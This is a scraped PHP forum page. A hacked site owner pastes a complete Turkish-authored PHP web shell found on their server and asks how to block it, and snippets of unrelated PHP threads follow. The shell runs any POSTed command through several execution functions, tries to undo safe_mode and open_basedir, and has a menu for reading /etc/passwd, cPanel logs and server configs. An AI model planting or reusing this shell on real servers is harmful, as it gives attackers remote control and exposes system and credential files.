I got hacked and the following code was placed within my files:
Code: [Select]<?
/*
Kodlama By Liz0ziM
Safe Mode Command Execution Shell
*/
function safeshell($komut)
{
ini_restore("safe_mode");
ini_restore("open_basedir");
$res = '';
if (!empty($komut))
{
if(function_exists('exec'))
{
@exec($komut,$res);
$res = join("n",$res);
}
elseif(function_exists('shell_exec'))
{
$res = @shell_exec($komut);
}
elseif(function_exists('system'))
{
@ob_start();
@system($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($komut,"r")))
{
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
echo "<b><font color=blue>Liz0ziM Private Safe Mode Command Execution Bypass Exploit</font></b>
";
print_r('
<pre>
<form method="POST" action="">
<b><font color=blue>Komut :</font></b><input name="baba" type="text"><input value="?al??t?r" type="submit">
</form>
<form method="POST" action="">
<b><font color=blue>H?zl? Men? :=) :</font><select size="1" name="liz0">
<option value="cat /etc/passwd">/etc/passwd</option>
<option value="netstat -an | grep -i listen">T?m A??k Portalar? G?r</option>
<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
<option value="cat /etc/hosts">/etc/hosts</option>
<option value="cat /etc/named.conf">/etc/named.conf</option>
<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
</select> <input type="submit" value="G?ster Bakim">
</form>
</pre>
');
ini_restore("safe_mode");
ini_restore("open_basedir");
if($_POST[baba]!= "") { $liz0=safeshell($_POST[baba]); }
if($_POST[liz0]!= "") { $liz0zim=safeshell($_POST[liz0]); }
$uid=safeshell('id');
$server=safeshell('uname -a');
echo "<pre><h4>";
echo "<b><font color=red>Kimim Ben :=)</font></b>:$uid
";
echo "<b><font color=red>Server</font></b>:$server
";
echo "<b><font color=red>Komut Sonu?lar?:</font></b>
";
if($_POST["baba"]!= "") { echo $liz0; }
if($_POST["liz0"]!= "") { echo $liz0zim; }
echo "</h4></pre>";
?>
How would i patch this?, like is their any code i can add to a global file to prevent this "safemode bypass"?
Executing an exe
Hi. I have some bizarre problem with exec (other any other method) to launch exe's. I am making a game server booking system and the part that is not working is the one with the launching the server
CE 7.1 and External GIS integration
Hi All,
Update Myspace status with CURL
Logging in:Code: <?phpclass Myspace{ function login($username, $password) { $username = $_POST['user']; $password = $_POST['passwd']; $login_url =
highlighting search terms
well, I started this in the regular PHP section, but it no longer fits there. Suffice it to say, I'm trying to take individual search terms that are being $_POSTed and highlighting them in the search
passing data from one page to another
hey guysi have the follwoing code to get information from one page and place on another:(1st page) page to get info from:Code: <?php session_start();$_SESSION['data'] = "blah blah
matching numbers inside ( )
I know I can match numbers by just [0-9]+, so I thought matching numbers inside ( ) would be something like Code: [Select]/\([0-9]+\)/, but that doesn't work Can someone correct me please?
listing help
Hi,at first, great new design!!! I like it,i got a problem,I want to list some tekst, but there is a users, users can list they own texts, and all teksts, and find words in all texts and in own
IIS & NW MII on the same server
Hi,
Wordpress IE issue
So I am trying to add the background shadow to my wordpress page. It works fine in Firefox but does not in IE.So here is the original code: <?php get_header(); ?><?php
Sort a two dimensional array.
Hi. I've set up a two dimensional array that reads as follows:Code: $modifiedData = array( array($arrCollingwoodStart[0], $numCollingwoodForTotal, $numCollingwoodAgainstTotal,